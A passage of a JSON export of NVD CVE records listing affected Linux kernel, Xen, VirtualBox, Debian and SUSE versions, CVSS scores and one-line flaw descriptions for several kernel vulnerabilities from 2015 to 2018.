"cpe:2.3:o:linux:linux_kernel:3.10.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.43:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.66:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.64:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.52:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.62:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.41:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.63:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.65:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.44:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.35:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.58:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.50:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.60:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.40:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.61:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.53:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.46:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.67:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.68:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.57:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.21:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:32:46", "description": "The KVM subsystem in the Linux kernel through 4.2.6, and Xen 4.3.x through 4.6.x, allows guest OS users to cause a denial of service (host OS panic or hang) by triggering many #DB (aka Debug) exceptions, related to svm.c.", "cvss3": {}, "published": "2015-11-16T11:59:00", "type": "cve", "title": "CVE-2015-8104", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8104"], "modified": "2019-02-13T20:52:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:xen:xen:4.5.2", "cpe:/a:oracle:vm_virtualbox:4.1.42", "cpe:/o:xen:xen:4.3.0", "cpe:/o:xen:xen:4.6.1", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:xen:xen:4.3.3", "cpe:/o:xen:xen:4.6.2", "cpe:/a:oracle:vm_virtualbox:4.2.34", "cpe:/o:xen:xen:4.4.3", "cpe:/a:oracle:vm_virtualbox:5.0.13", "cpe:/o:xen:xen:4.5.0", "cpe:/o:xen:xen:4.6.5", "cpe:/o:linux:linux_kernel:4.2.3", "cpe:/o:xen:xen:4.4.1", "cpe:/a:oracle:vm_virtualbox:4.0.34", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:xen:xen:4.6.4", "cpe:/o:xen:xen:4.3.2", "cpe:/o:xen:xen:4.3.1", "cpe:/o:xen:xen:4.4.0", "cpe:/o:xen:xen:4.6.0", "cpe:/o:debian:debian_linux:9.0", "cpe:/o:xen:xen:4.5.1", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:xen:xen:4.3.4", "cpe:/o:oracle:solaris:11.3", "cpe:/a:oracle:vm_virtualbox:4.3.35", "cpe:/o:canonical:ubuntu_linux:15.04", "cpe:/o:xen:xen:4.4.2"], "id": "CVE-2015-8104", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8104", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:xen:xen:4.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.2.34:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.04:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.4.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.6.4:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.6.1:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.5.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.6.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.1.42:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:5.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.0.34:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:xen:xen:4.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.3.35:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2023-06-07T14:15:49", "description": "The cdrom_ioctl_media_changed function in drivers/cdrom/cdrom.c in the Linux kernel before 4.16.6 allows local attackers to use a incorrect bounds check in the CDROM driver CDROM_MEDIA_CHANGED ioctl to read out kernel memory.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-05-09T17:29:00", "type": "cve", "title": "CVE-2018-10940", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10940"], "modified": "2018-10-31T10:30:00", "cpe": ["cpe:/o:debian:debian_linux:7.0"], "id": "CVE-2018-10940", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10940", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:41:08", "description": "Race condition in fs/timerfd.c in the Linux kernel before 4.10.15 allows local users to gain privileges or cause a denial of service (list corruption or use-after-free) via simultaneous file-descriptor operations that leverage improper might_cancel queueing.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-08-19T18:29:00", "type": "cve", "title": "CVE-2017-10661", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10661"], "modified": "2018-10-31T10:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.10.14"], "id": "CVE-2017-10661", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10661", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.10.14:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T15:06:40", "description": "The usb_destroy_configuration function in drivers/usb/core/config.c in the USB core subsystem in the Linux kernel through 4.14.5 does not consider the maximum number of configurations and interfaces before attempting to release resources, which allows local users to cause a denial of service (out-of-bounds write access) or possibly have unspecified other impact via a crafted USB device.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.6, "vectorString": "CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-12T15:29:00", "type": "cve", "title": "CVE-2017-17558", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-17558"], "modified": "2019-05-14T23:29:00", "cpe": ["cpe:/o:suse:linux_enterprise_server:11", "cpe:/o:linux:linux_kernel:4.14.5"], "id": "CVE-2017-17558", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-17558", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:suse:linux_enterprise_server:11:extra:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:11:sp4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.14.5:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:30:50", "description": "fs/pipe.c in the Linux kernel before 4.5 does not limit the amount of unread data in pipes, which allows local users to cause a denial of service (memory consumption) by creating many pipes with non-default sizes.", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.2, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-04-27T17:59:00", "type": "cve", "title": "CVE-2016-2847", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2847"], "modified": "2023-02-12T23:17:00", "cpe": ["cpe:/o:novell:suse_linux_enterprise_desktop:12.0", "cpe:/o:novell:suse_linux_enterprise_server:11.0", "cpe:/o:linux:linux_kernel:4.4.8", "cpe:/o:novell:suse_linux_enterprise_debuginfo:11.0", "cpe:/o:novell:suse_linux_enterprise_software_development_kit:12.0", "cpe:/o:novell:suse_linux_enterprise_live_patching:12.0", "cpe:/o:novell:suse_linux_enterprise_real_time_extension:11.0", "cpe:/o:novell:suse_linux_enterprise_real_time_extension:12.0", "cpe:/o:novell:suse_linux_enterprise_workstation_extension:12.0", "cpe:/o:novell:suse_linux_enterprise_module_for_public_cloud:12.0", "cpe:/o:novell:suse_linux_enterprise_software_development_kit:11.0", "cpe:/o:novell:suse_linux_enterprise_server:12.0"], "id": "CVE-2016-2847", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2847", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:11.0:sp4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.4.8:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_live_patching:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:11.0:extra:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_real_time_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_module_for_public_cloud:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_real_time_extension:11.0:sp4:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_debuginfo:11.0:sp4:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:11.0:sp4:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:47:12", "description": "The __get_user_asm_ex macro in arch/x86/include/asm/uaccess.h in the Linux kernel 4.4.22 through 4.4.28 contains extended asm statements that are incompatible with the exception table, which allows local users to obtain root access on non-SMEP platforms via a crafted application. NOTE: this vulnerability exists because of incorrect backporting of the CVE-2016-9178 patch to older kernels.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-11-28T03:59:00", "type": "cve", "title": "CVE-2016-9644", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 